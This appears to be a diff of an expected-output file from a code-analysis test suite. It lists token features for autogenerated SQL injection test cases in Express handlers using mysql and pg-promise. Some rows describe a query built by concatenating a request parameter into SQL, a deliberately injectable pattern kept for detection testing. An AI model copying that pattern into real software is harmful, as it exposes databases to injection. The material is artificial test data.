results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | connect ... ds) {}) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | connect ... ds) {}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | exceptional return of connect ... ds) {}) | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | exceptional return of connect ... ds) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | exceptional return of connect ... ds) {}) | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | exceptional return of connect ... ds) {}) | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:9:20:48 | exceptional return of connect ... ds) {}) | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:20:19:24 | query | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:20:19:24 | query | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:20:19:24 | query | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:20:19:24 | query | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:20:19:24 | query | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:66 | 'SELECT ... or` = ' | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:66 | 'SELECT ... or` = ' | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:66 | 'SELECT ... or` = ' | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:66 | 'SELECT ... or` = ' | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:66 | 'SELECT ... or` = ' | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:66 | 'SELECT ... or` = ' | stringConcatenatedWith | -endpoint- temp | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:73 | 'SELECT ... + temp | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:73 | 'SELECT ... + temp | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:73 | 'SELECT ... + temp | contextFunctionInterfaces | handler(req, res) | @@ -3426,6 +16783,27 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:73 | 'SELECT ... + temp | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:73 | 'SELECT ... + temp | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:26:19:73 | 'SELECT ... + temp | receiverName | connection | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:70:19:73 | temp | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:70:19:73 | temp | contextSurroundingFunctionParameters | (req, res)\n(err, connection) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:70:19:73 | temp | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:70:19:73 | temp | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:70:19:73 | temp | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:19:70:19:73 | temp | stringConcatenatedWith | 'SELECT * FROM `books` WHERE `author` = ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:12 | this | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:12 | this | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:12 | this | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:12 | this | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | 'arguments' object of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | 'arguments' object of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | 'arguments' object of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | exceptional return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | exceptional return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | exceptional return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | exceptional return of anonymous function | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | functio ... lds) {} | CalleeFlexibleAccessPath | connection.query | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | functio ... lds) {} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | functio ... lds) {} | contextFunctionInterfaces | handler(req, res) | @@ -3434,6 +16812,229 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | functio ... lds) {} | enclosingFunctionName | handler | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | functio ... lds) {} | fileImports | express mysql | | autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | functio ... lds) {} | receiverName | connection | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | return of anonymous function | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | return of anonymous function | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | return of anonymous function | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:13:20:47 | return of anonymous function | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:22:20:26 | error | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:22:20:26 | error | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:22:20:26 | error | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:22:20:26 | error | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:22:20:26 | error | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:29:20:35 | results | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:29:20:35 | results | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:29:20:35 | results | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:29:20:35 | results | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:29:20:35 | results | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:38:20:43 | fields | contextFunctionInterfaces | handler(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:38:20:43 | fields | contextSurroundingFunctionParameters | (req, res)\n(err, connection)\n(error, results, fields) | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:38:20:43 | fields | enclosingFunctionBody | req res temp req params value pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = ? values temp error results fields pool getConnection err connection connection query sql SELECT * FROM `books` WHERE `author` = temp error results fields pool getConnection err connection connection query SELECT * FROM `books` WHERE `author` = temp error results fields | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:38:20:43 | fields | enclosingFunctionName | handler | +| autogenerated/NosqlAndSqlInjection/untyped/mysql.js:20:38:20:43 | fields | fileImports | express mysql | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:0 | this | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:0 | this | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:1 | Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:1 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:1 | Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:1 | require | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:1 | require | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:39 | import ... omise"; | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:39 | import ... omise"; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:1:1:39 | import ... omise"; | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:10:1:18 | IDatabase | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:27:1:38 | "pg-promise" | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:27:1:38 | "pg-promise" | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:1:27:1:38 | "pg-promise" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:8:11:1 | Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:8:11:1 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:8:11:1 | Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:8:11:1 | class F ... ;\\n }\\n} | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:8:11:1 | class F ... ;\\n }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:8:11:1 | class F ... ;\\n }\\n} | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:14:3:16 | Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:14:3:16 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:14:3:16 | Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:14:3:16 | Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | 'arguments' object of default constructor of class Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | 'arguments' object of default constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | 'arguments' object of default constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | 'arguments' object of default constructor of class Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | () {} | assignedToPropName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | () {} | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | () {} | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | () {} | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor() {} | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor() {} | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor() {} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor() {} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor() {} | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | constructor() {} | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | exceptional return of default constructor of class Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | exceptional return of default constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | exceptional return of default constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | exceptional return of default constructor of class Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | return of default constructor of class Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | return of default constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | return of default constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | return of default constructor of class Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | this | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | this | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:3:18:3:17 | this | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:4 | db | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:4 | db | contextSurroundingFunctionParameters | () | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:4 | db | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:4 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | enclosingFunctionName | constructor | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:4:3:4:16 | db: IDatabase; | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:2 | this | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:2 | this | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:2 | this | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:2 | this | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:11 | onRequest | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:11 | onRequest | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:6:11 | onRequest | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | 'arguments' object of method onRequest of class Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | 'arguments' object of method onRequest of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | 'arguments' object of method onRequest of class Foo | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | 'arguments' object of method onRequest of class Foo | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | 'arguments' object of method onRequest of class Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | exceptional return of method onRequest of class Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | exceptional return of method onRequest of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | exceptional return of method onRequest of class Foo | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | exceptional return of method onRequest of class Foo | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | exceptional return of method onRequest of class Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | assignedToPropName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | onReque ... ();\\n } | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | return of method onRequest of class Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | return of method onRequest of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | return of method onRequest of class Foo | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | return of method onRequest of class Foo | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:3:10:3 | return of method onRequest of class Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:13:6:15 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | enclosingFunctionBody | req res taint req params x db one taint res end | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | enclosingFunctionName | onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:6:18:6:20 | res | enclosingFunctionName | onRequest | +| 